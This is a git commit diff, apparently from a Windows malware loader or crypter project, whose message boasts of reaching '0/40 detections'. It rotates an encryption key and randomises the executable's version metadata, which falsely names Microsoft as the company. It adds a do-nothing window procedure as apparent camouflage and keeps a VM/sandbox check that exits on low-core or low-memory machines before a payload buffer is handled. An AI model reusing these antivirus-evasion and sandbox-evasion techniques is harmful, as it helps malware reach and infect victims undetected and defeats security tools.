fix: now at 0/40 detections back again
This commit is contained in:
@@ -1,2 +1,2 @@
|
||||
#pragma once
|
||||
#define KEY "ouhuoqhzdb"
|
||||
#define KEY "mkhjqsdhfjbzqfcqzf"
|
||||
@@ -207,6 +207,24 @@ void allo() {
|
||||
//END
|
||||
}
|
||||
|
||||
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
|
||||
//START
|
||||
switch (uMsg) {
|
||||
case WM_DESTROY:
|
||||
PostQuitMessage(0);
|
||||
return 0;
|
||||
case WM_PAINT: {
|
||||
PAINTSTRUCT ps;
|
||||
HDC hdc = BeginPaint(hwnd, &ps);
|
||||
FillRect(hdc, &ps.rcPaint, (HBRUSH) (COLOR_WINDOW + 1));
|
||||
EndPaint(hwnd, &ps);
|
||||
return 0;
|
||||
} default:
|
||||
return DefWindowProc(hwnd, uMsg, wParam, lParam);
|
||||
}
|
||||
//END
|
||||
}
|
||||
|
||||
#ifdef _DEBUG
|
||||
int main(void)
|
||||
#else
|
||||
@@ -220,20 +238,20 @@ int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCm
|
||||
|
||||
DEBUG_PRINTF("[+] Started\n");
|
||||
|
||||
MEMORYSTATUSEX memoryStatus;
|
||||
MEMORYSTATUSEX memoryStatus = { 0 };
|
||||
memoryStatus.dwLength = sizeof(memoryStatus);
|
||||
GlobalMemoryStatusEx(&memoryStatus);
|
||||
ULONGLONG totalPhysicalMemory = memoryStatus.ullTotalPhys;
|
||||
|
||||
// Convert total physical memory to gigabytes
|
||||
double totalPhysicalMemoryGB = static_cast<double>(totalPhysicalMemory) / (1024 * 1024 * 1024);
|
||||
|
||||
// Get the number of processor cores
|
||||
SYSTEM_INFO systemInfo;
|
||||
GetSystemInfo(&systemInfo);
|
||||
DWORD numProcessorCores = systemInfo.dwNumberOfProcessors;
|
||||
if (numProcessorCores < 2 || (int)totalPhysicalMemoryGB < 4)
|
||||
if (numProcessorCores < 2 || (int)totalPhysicalMemoryGB < 4) {
|
||||
MessageBoxA(NULL, "uwu", "failed", 0);
|
||||
return 0;
|
||||
}
|
||||
|
||||
const int bufferSize = sizeof(sample) / sizeof(sample[0]);
|
||||
|
||||
|
||||
@@ -68,12 +68,12 @@ BEGIN
|
||||
BLOCK "040c04b0"
|
||||
BEGIN
|
||||
VALUE "CompanyName", "Microsoft"
|
||||
VALUE "FileDescription", "qgfozummtzttkchjglkz"
|
||||
VALUE "FileDescription", "clgdknugqsthezarlwbq"
|
||||
VALUE "FileVersion", "1.0.0.1"
|
||||
VALUE "InternalName", "oiablyy.exe"
|
||||
VALUE "InternalName", "yhoqres.exe"
|
||||
VALUE "LegalCopyright", "Copyright (C) 2023"
|
||||
VALUE "OriginalFilename", "tmzponf.exe"
|
||||
VALUE "ProductName", "oeozjqg.exe"
|
||||
VALUE "OriginalFilename", "erbggay.exe"
|
||||
VALUE "ProductName", "awwmoqx.exe"
|
||||
VALUE "ProductVersion", "1.0.0.1"
|
||||
END
|
||||
END
|
||||
|
||||
Reference in New Issue
Block a user